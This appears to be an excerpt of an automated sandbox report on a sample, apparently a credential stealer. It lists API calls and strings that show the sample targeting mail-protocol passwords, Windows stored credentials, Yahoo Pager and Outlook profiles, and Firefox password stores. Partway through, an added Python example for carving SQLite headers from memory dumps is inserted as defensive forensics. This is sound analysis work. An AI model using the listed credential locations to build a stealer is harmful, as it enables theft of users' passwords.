• Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
• Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
• _strcmpi.MSVCRT ref: 004044FA
• _strcmpi.MSVCRT ref: 00404518
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi$memcpystrlen
• String ID: imap$pop3$smtp
• API String ID: 2025310588-821077329
• Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
• Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
• Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
• Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BD88
  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
  • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
  • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
  • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
  • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
  • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
  • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
  • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
• Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
• Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
• Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
• Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403A78
• memset.MSVCRT ref: 00403A91
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
• strlen.MSVCRT ref: 00403AD9
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWidememset$FileWritestrlen
• String ID:
• API String ID: 1786725549-0
• Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
• Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
• Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
• GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
• OpenClipboard.USER32(?), ref: 0040BF0C
• GetLastError.KERNEL32 ref: 0040BF25
• DeleteFileA.KERNEL32(00000000), ref: 0040BF42
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
• Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
• Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
Uniqueness
Uniqueness Score: -1.00%

APIs
• memcmp.MSVCRT ref: 00406129
  • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
  • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
  • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
• memcmp.MSVCRT ref: 00406154
• memcmp.MSVCRT ref: 0040617C
• memcpy.MSVCRT ref: 00406199
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
• Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
• Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
• Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
• Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 004016A2
• GetSystemMetrics.USER32(00000015), ref: 004016B0
• GetSystemMetrics.USER32(00000014), ref: 004016BC
• BeginPaint.USER32(?,?), ref: 004016D6
• DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
• EndPaint.USER32(?,?), ref: 004016F2
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
• Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
• Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(?), ref: 0040C352
• SetFocus.USER32(?,?,?), ref: 0040C3F8
• InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: DestroyFocusInvalidateRectWindow
• String ID: XgD$rY@
• API String ID: 3502187192-1347721759
• Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
• Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
• Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                          • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                                          • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                          • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                                          • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                          • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                          • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                                          • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                          • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 2859077140-3316789007
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.MSVCRT ref: 00443A57
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
Strings
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.MSVCRT ref: 00409031
• GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
• _mbscpy.MSVCRT ref: 0040906D
Strings
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
• {?@ UD, xrefs: 0040900D
Similarity
• API ID: PrivateProfileString_mbscpymemset
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
• API String ID: 408644273-2682877464
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
Uniqueness
Uniqueness Score: -1.00%
APIs
• LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,764771C0,00405E9E,00000000), ref: 00410912
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
• FreeLibrary.KERNEL32(00000000), ref: 00410938
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: memset$memcpy
• String ID: $no query solution
• API String ID: 368790112-326442043
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 0043027A
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
• foreign key on %s should reference only one column of table %T, xrefs: 0043005F
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: memset
• String ID: H
• API String ID: 2221118986-2852464175
                                                                                                                                                                                                          • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                          • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: @ $SQLite format 3
• API String ID: 231171946-3708268960
• Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
• Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
• Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
• Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
Uniqueness

Uniqueness Score: -1.00%
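The function above does a memcmp against the "SQLite format 3" magic, which is how an embedded SQLite engine validates a database file before reading it (browser credential stores are SQLite files). When triaging a memory dump such as the one this block was lifted from, the same magic is a useful carving marker. The following is an added example, not code from the report or from the sample: it carves SQLite 3 headers out of a raw dump and validates the header fields the SQLite file format specifies (page size, read/write versions, fixed payload fractions), so that a stray 16-byte string match is not mistaken for a database. The dump bytes are constructed inline for the example.

```python
import struct
from typing import Dict, List, Optional

# 16-byte magic the sample compares against; the same bytes open every SQLite 3 file.
SQLITE_MAGIC = b"SQLite format 3\x00"


def parse_sqlite_header(buf: bytes, off: int = 0) -> Optional[Dict[str, object]]:
    """Parse the 100-byte SQLite 3 file header at buf[off:].

    Returns a dict of the interesting fields, or None when the bytes do not
    form a valid header (field layout per the SQLite file format spec).
    """
    hdr = buf[off:off + 100]
    if len(hdr) < 100 or hdr[:16] != SQLITE_MAGIC:
        return None
    page_size = struct.unpack(">H", hdr[16:18])[0]
    if page_size == 1:              # the value 1 encodes a 65536-byte page
        page_size = 65536
    # page size must be a power of two in [512, 65536]
    if page_size < 512 or page_size & (page_size - 1):
        return None
    write_ver, read_ver = hdr[18], hdr[19]
    if write_ver not in (1, 2) or read_ver not in (1, 2):
        return None
    # max/min embedded payload fraction and leaf payload fraction are fixed at 64/32/32
    if (hdr[21], hdr[22], hdr[23]) != (64, 32, 32):
        return None
    page_count = struct.unpack(">I", hdr[28:32])[0]
    text_enc = struct.unpack(">I", hdr[56:60])[0]
    return {
        "offset": off,
        "page_size": page_size,
        "reserved_per_page": hdr[20],
        "page_count": page_count,
        "journal_mode": "wal" if write_ver == 2 else "legacy",
        "encoding": {1: "utf-8", 2: "utf-16le", 3: "utf-16be"}.get(text_enc, "unset/unknown"),
    }


def carve_sqlite_headers(dump: bytes) -> List[Dict[str, object]]:
    """Find every offset in dump that holds a valid SQLite 3 header."""
    found = []
    pos = dump.find(SQLITE_MAGIC)
    while pos != -1:
        hdr = parse_sqlite_header(dump, pos)
        if hdr is not None:
            found.append(hdr)
        pos = dump.find(SQLITE_MAGIC, pos + 1)
    return found


def build_header(page_size: int = 4096, page_count: int = 3,
                 write_ver: int = 1, read_ver: int = 1, text_enc: int = 1) -> bytes:
    """Build a minimal, valid SQLite 3 header (used only to construct test input)."""
    hdr = bytearray(100)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18], hdr[19] = write_ver, read_ver
    hdr[21], hdr[22], hdr[23] = 64, 32, 32
    struct.pack_into(">I", hdr, 28, page_count)
    struct.pack_into(">I", hdr, 56, text_enc)
    return bytes(hdr)


def constructed_dump() -> bytes:
    """Constructed sample 'memory dump': filler, one real header at offset 64,
    more filler, then a decoy that carries the magic but an impossible page size (3)."""
    decoy = SQLITE_MAGIC + b"\x00\x03" + bytes(82)
    return bytes(64) + build_header() + b"\x90" * 200 + decoy + bytes(32)


if __name__ == "__main__":
    for h in carve_sqlite_headers(constructed_dump()):
        print(h)
```

On a real dump, run `carve_sqlite_headers` over the `.sdmp` contents; each hit's `page_size` and `page_count` tell you how many bytes to carve out for an attempt to open the database with the sqlite3 module.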

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
• API String ID: 3510742995-3170954634
• Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
• Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
• Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
• Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245
• Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
• Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
• Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
• Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: winRead
• API String ID: 1297977491-2759563040
• Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
• Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
• Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
• Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
• memset.MSVCRT ref: 0040A8F8
  • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040A93D
Strings
Memory Dump Source
